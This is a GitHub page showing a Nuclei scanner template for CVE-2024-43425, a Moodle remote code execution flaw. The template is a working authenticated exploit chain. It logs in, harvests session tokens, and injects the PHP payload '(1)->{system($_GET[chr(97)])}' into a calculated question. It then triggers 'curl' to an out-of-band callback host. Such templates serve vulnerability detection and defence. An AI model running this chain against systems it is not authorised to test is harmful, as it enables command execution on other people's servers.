forked from projectdiscovery/nuclei-templates
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathCVE-2024-43425.yaml
More file actions
136 lines (116 loc) · 5.56 KB
/
CVE-2024-43425.yaml
File metadata and controls
136 lines (116 loc) · 5.56 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
id: CVE-2024-43425
info:
name: Moodle - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: critical
description: |
Attackers with the permission to create or modify questions in Moodle courses are able to craft malicious inputs for calculated questions, which can be abused to execute arbitrary commands on the underlying system.
impact: |
Authenticated attackers with question creation permissions can craft malicious calculated questions to execute arbitrary commands on the underlying system.
remediation: |
Apply security patches for Moodle addressing CVE-2024-43425.
reference:
- https://github.com/RedTeamPentesting/moodle-rce-calculatedquestions
- https://blog.redteam-pentesting.de/2024/moodle-rce/
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2024-009/
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43425
classification:
cvss-score: 9.8
cve-id: CVE-2024-43425
epss-score: 0.89363
epss-percentile: 0.99523
cpe: cpe:2.3:a:moodle:moodle:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: title:"Moodle"
product: moodle
vendor: moodle
tags: cve,cve2024,moodle,rce,authenticated,vuln
flow: http(1) && http(2) && http(3) && http(4) && http(5) && http(6)
http:
- raw:
- |
GET /login/index.php HTTP/1.1
Host: {{Hostname}}
- |
POST /login/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
anchor=&logintoken={{token}}&username={{username}}&password={{password}}
host-redirects: true
extractors:
- type: regex
part: body
name: token
group: 1
regex:
- 'name="logintoken" value="([a-zA-Z0-9]+)">'
internal: true
- raw:
- |
GET /my/courses.php HTTP/1.1
Host: {{Hostname}}
extractors:
- type: regex
name: sesskey
part: body
internal: true
group: 1
regex:
- '"sesskey":"([^"]+)"'
- raw:
- |
POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
[{"index":0,"methodname":"core_course_get_enrolled_courses_by_timeline_classification","args":{"offset":0,"limit":0,"classification":"all","sort":"fullname","customfieldname":"","customfieldvalue":"","requiredfields":["id","fullname","shortname","showcoursecategory","showshortname","visible","enddate"]}}]
extractors:
- type: json
part: body
name: courseid
json:
- ".[].data.courses[0].id"
internal: true
- raw:
- |
POST /question/bank/editquestion/question.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
initialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes
extractors:
- type: regex
part: header
name: id
group: 1
internal: true
regex:
- "&id=([0-9]+)&"
- raw:
- |
POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
id={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page
extractors:
- type: regex
part: header
name: rceurl
group: 1
internal: true
regex:
- "Location: https?://.*?/question/(.*)&returnurl"
- raw:
- |
GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 200
# digest: 4a0a00473045022030207be922b7696e0fc937a996ab97825edcbeeb658287cf4d5a5e09a4336c7702210096a60ae2ae342daa4db3fa51b77ae569860a5f92590d97f489b07a10ecf00534:922c64590222798bb761d5b6d8e72950